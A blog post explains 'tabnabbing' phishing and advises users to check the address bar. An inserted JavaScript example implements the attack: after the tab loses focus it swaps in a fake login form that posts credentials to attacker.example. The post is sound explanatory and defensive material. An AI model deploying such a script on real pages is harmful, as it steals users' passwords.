Tabbed browsing has been around for quite a while now, allowing users to switch between dozens of websites whilst keeping the task bar clutter free. One 2009 study found that users switch tabs at least 57.4% of the time, and that 36% of users open new tabs for search engine use.

It's become common practice for internet users to log in to several websites at once, each in its own tab. A recent study of Firefox users by Mozilla found the following reasons for using tabbed browsing:

– To act as a reminder to do something later
– Opening many document/search links at once
– As a substitute for the back button
– Keeping frequently used sites open
– Temporary bookmarks

The study also found that, on average, 73.3% of tab switches were revisits to a tab that was already open.

All of this would simply be an interesting way of looking at internet browsing if it weren't for one small detail: phishers are exploiting the habit.

During a typical day in the office, you may have several applications that require a login open at once. Let's say you have Google, LinkedIn, Twitter, BBC News and Amazon open. You're in the middle of looking for something on Amazon when someone asks you to find an article for them, so you switch to Google and carry out a search. After a while you switch back to Amazon and are confronted not with the page you were previously on, but with the login page. No problem: you've obviously just been logged out of the site and need to log back in. That's what many would assume, and that is precisely the assumption phishers are playing on.

"Tabnabbing" (also written "tabnapping"), as it's being called, is where an attacker uses JavaScript on a page you already have open to notice that its tab has lost focus, wait a while, and then rewrite the page's title, favicon and contents, so that when you return to the tab you're on a fake login page rather than the one you'd left. Unless you check the URL, you may not realise that the page is a fake, or that the tab now showing your bank's login page is not the one in which you actually had your bank open. The fake page may even display a message saying that your session has timed out. Aza Raskin of Mozilla demonstrates just how easy it is to hijack the tab and fool the unwitting user. (You can also find out more about the problem, and test it out for yourself, over at his blog.)
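The mechanism described above, as an added example that is not code from the original post or from Aza Raskin's demo page: the page waits for its tab to lose focus, starts a countdown, and on expiry swaps in lookalike content. The document and the timers are injected so the timing logic can be run and checked outside a browser; `createTabnabber`, `FAKE_LOGIN`, `sameOrigin`, the delay value and the `attacker.example` host are all assumptions for illustration. Note what the adapter does not expose: there is no way to set `href`, because a page's script cannot make the address bar show another site's domain, which is why the URL check discussed later is the user's reliable signal.

```javascript
// Added example (not from the original post or Raskin's demo): the core of a
// tabnabbing page, written so the focus/timer logic can run without a browser.
const TABNAB_DELAY_MS = 5000; // assumed delay before the swap; real pages vary this

// Lookalike content the attacker swaps in. Constructed for this example.
const FAKE_LOGIN = {
  title: 'Sign in to your account',
  favicon: 'https://attacker.example/lookalike-favicon.ico',
  body: '<p>Your session has timed out. Please sign in again.</p>' +
        '<form method="post" action="https://attacker.example/collect">' +
        '<input name="user"><input name="pass" type="password">' +
        '<button>Sign in</button></form>',
};

// doc: object with writable title/favicon/body and a read-only href.
// timers: { schedule(fn, ms) -> handle, cancel(handle) }; defaults to real timers.
function createTabnabber(doc, { delayMs = TABNAB_DELAY_MS, timers } = {}) {
  const t = timers || {
    schedule: (fn, ms) => setTimeout(fn, ms),
    cancel: (handle) => clearTimeout(handle),
  };
  const original = { title: doc.title, favicon: doc.favicon, body: doc.body };
  let pending = null;   // timer handle while the countdown is running
  let swapped = false;

  function swap() {
    pending = null;
    doc.title = FAKE_LOGIN.title;     // tab label
    doc.favicon = FAKE_LOGIN.favicon; // tab icon
    doc.body = FAKE_LOGIN.body;       // visible page; doc.href is untouched
    swapped = true;
  }

  return {
    // Tab lost focus: start the countdown (once).
    onBlur() { if (!swapped && pending === null) pending = t.schedule(swap, delayMs); },
    // User came back early: cancel so the page still looks untouched.
    onFocus() { if (pending !== null) { t.cancel(pending); pending = null; } },
    isSwapped() { return swapped; },
    original,
  };
}

// The defence the text recommends, done properly: compare the full origin, not a
// substring, so "https://www.amazon.co.uk.attacker.example" does not pass as Amazon.
function sameOrigin(href, expectedOrigin) {
  try { return new URL(href).origin === new URL(expectedOrigin).origin; }
  catch (e) { return false; }
}

// Browser wiring. The adapter exposes exactly what the page can rewrite.
function browserDocAdapter() {
  const iconLink = () => document.querySelector('link[rel~="icon"]');
  return {
    get title() { return document.title; },
    set title(v) { document.title = v; },
    get favicon() { const l = iconLink(); return l ? l.href : ''; },
    set favicon(v) {
      let l = iconLink();
      if (!l) { l = document.createElement('link'); l.rel = 'icon'; document.head.appendChild(l); }
      l.href = v;
    },
    get body() { return document.body.innerHTML; },
    set body(v) { document.body.innerHTML = v; },
    get href() { return location.href; },
  };
}

if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const nabber = createTabnabber(browserDocAdapter());
  window.addEventListener('blur', nabber.onBlur);
  window.addEventListener('focus', nabber.onFocus);
}
```

Loaded into an otherwise innocent page, the script does nothing while the tab is active; it only rewrites the tab once the user has been away for the delay, and it rolls nothing back on return, because the whole point is that the user sees the fake. The only signal it cannot forge is the address bar.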

So, what can the user do? Normally I would recommend installing NoScript on Firefox to prevent unauthorised JavaScript from running on your computer, but that won't help in this case. Aspects of the user's behaviour need to change as well. Users should keep the number of open tabs to a minimum; always check that the domain shown in the address bar matches the site you expect before entering any login, financial or identity information, because the address bar is the one thing the page's script cannot change to another site's domain; and, if in doubt, close the tab and navigate to the page again from scratch.

It's important to remember that when we fill out online forms and submit login details, we are entrusting our information to an organisation outside our control. It's not enough just to trust these organisations to protect our data; we need to make sure we do, too.